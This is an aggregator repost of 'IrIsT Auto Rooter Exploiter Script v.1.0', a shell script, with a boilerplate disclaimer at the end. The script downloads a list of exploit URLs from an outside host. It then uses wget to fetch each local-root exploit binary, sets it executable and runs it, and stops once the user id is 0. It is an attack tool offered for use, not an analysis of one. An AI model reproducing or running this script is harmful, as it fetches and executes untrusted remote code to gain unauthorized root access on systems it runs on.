Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

IrIsT Auto Rooter Exploiter Script v.1.0

$
0
0

#!/bin/sh
# IrIsT Auto Rooter Exploiter Script v.1.0
# Author : Beni_Vanda
# IrIsT.Ir
# Greetz to : Amir ,C0dex ,B3HZ4D ,TaK.FaNaR ,Dead.Zone ,M3hdi ,AlrZ ,F@rid , Dr.Tofan and All Members In Www.IrIsT.Ir

function Is_Rooted
{
 if [ "$(id -u)" = "0" ];
 then
 echo "Rooted :D The_End :D ... ";
 exit;
 else
 rm rooter;
 echo "Not Root :| . Try Again ... ";
 echo "";
 fi;
}

function Try_To_Root
{
  for line in `cat Rooter_List.txt`
  do
  wget -O rooter $line
  chmod 0777 rooter
  ./rooter
  Is_Rooted;
  done
}

function main_rooter
{
 mkdir irist_rooter && cd irist_rooter;
 wget  http://benivanda.persiangig.com/autorooter/Rooter_List.txt
 Try_To_Root;
}

main_rooter;





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


Viewing all articles
Browse latest Browse all 8064

Trending Articles